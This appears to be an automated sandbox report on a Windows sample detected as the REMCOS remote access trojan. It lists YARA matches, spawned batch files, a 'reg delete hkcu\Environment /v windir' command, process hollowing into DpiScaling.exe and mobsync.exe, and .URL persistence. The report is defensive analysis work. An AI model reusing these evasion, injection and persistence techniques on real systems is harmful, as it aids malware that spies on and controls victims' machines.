              Source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: yVhvGnsUpL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\Public\Libraries\eljkarS.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E2BE1 ExitWindowsEx,LoadLibraryA,GetProcAddress,28_2_006E2BE1
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004340D512_2_004340D5
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0042309812_2_00423098
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0041120512_2_00411205
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0043820B12_2_0043820B
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004223C012_2_004223C0
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0044D3FA12_2_0044D3FA
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0043843A12_2_0043843A
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_007040D528_2_007040D5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006F309828_2_006F3098
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E120528_2_006E1205
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0070820B28_2_0070820B
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0071D3FA28_2_0071D3FA
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006F23C028_2_006F23C0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0070843A28_2_0070843A
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E952128_2_006E9521
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0070450A28_2_0070450A
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0071B5AB28_2_0071B5AB
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0070167028_2_00701670
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_007216E028_2_007216E0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FE6D528_2_006FE6D5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_007037C128_2_007037C1
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006F28B728_2_006F28B7
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0070493F28_2_0070493F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0070FA5028_2_0070FA50
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006EAAA028_2_006EAAA0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00700BBE28_2_00700BBE
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_0071BCC928_2_0071BCC9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00703CBD28_2_00703CBD
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006F2F5528_2_006F2F55
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00707FDC28_2_00707FDC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_105B323328_2_105B3233
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_105AA39428_2_105AA394
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_105C24E328_2_105C24E3
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_105BF54828_2_105BF548
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_1059163828_2_10591638
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_105C463428_2_105C4634
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_105B372A28_2_105B372A
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 0042F49E appears 37 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 006FF49E appears 37 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 006FFB60 appears 53 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 006D2084 appears 79 times
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,12_2_0041412B
              Source: yVhvGnsUpL.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: yVhvGnsUpL.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Srakjle.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Srakjle.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: yVhvGnsUpL.exeVirustotal: Detection: 17%
              Source: yVhvGnsUpL.exeReversingLabs: Detection: 13%
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeFile read: C:\Users\user\Desktop\yVhvGnsUpL.exeJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\yVhvGnsUpL.exe 'C:\Users\user\Desktop\yVhvGnsUpL.exe'
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Libraries\Srakjle\Srakjle.exe 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
              Source: unknownProcess created: C:\Users\Public\Libraries\Srakjle\Srakjle.exe 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' 'Jump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' 'Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E3958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,28_2_006E3958
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\Srakjlekngtcyxfikcsesbckosunxns[1]Jump to behavior
              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@23/10@75/2
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_004163AD
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0040D211
              Source: C:\Windows\SysWOW64\DpiScaling.exeMutant created: \Sessions\1\BaseNamedObjects\Sept-AITAB5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E6C39 FindResourceA,LoadResource,LockResource,SizeofResource,28_2_006E6C39
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: yVhvGnsUpL.exeStatic file information: File size 1133568 > 1048576
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004510A8 push eax; ret 12_2_004510C6
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_00458445 push esi; ret 12_2_0045844E
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7D3AE push edx; retf 23_3_03B7D3BC
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7CFF7 pushfd ; iretd 23_3_03B7CFFE
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7C930 push esi; ret 23_3_03B7C93D
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7EB5C push es; iretd 23_3_03B7EB5D
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7D0B8 push ebx; retf 23_3_03B7D0BA
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7C2FA pushad ; retf 23_3_03B7C2FB
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7F2E4 push esp; retf 23_3_03B7F2EF
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7F6D8 push ss; ret 23_3_03B7F6E4
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7EA3E push ebx; retf 23_3_03B7EA4B
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7E212 push ecx; iretd 23_3_03B7E213
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 23_3_03B7EE72 push eax; ret 23_3_03B7EE7B
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CB97E4 push ecx; ret 24_3_03CB9848
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CBB1FA push esi; retf 24_3_03CBB200
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CBC7B7 push es; ret 24_3_03CBC7BF
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CB917B push edx; ret 24_3_03CB917C
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CB909D push edx; iretd 24_3_03CB909E
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CB9495 push ecx; ret 24_3_03CB9496
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CBAEA2 push esp; ret 24_3_03CBAEA9
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeCode function: 24_3_03CBC2A4 pushfd ; ret 24_3_03CBC2A8
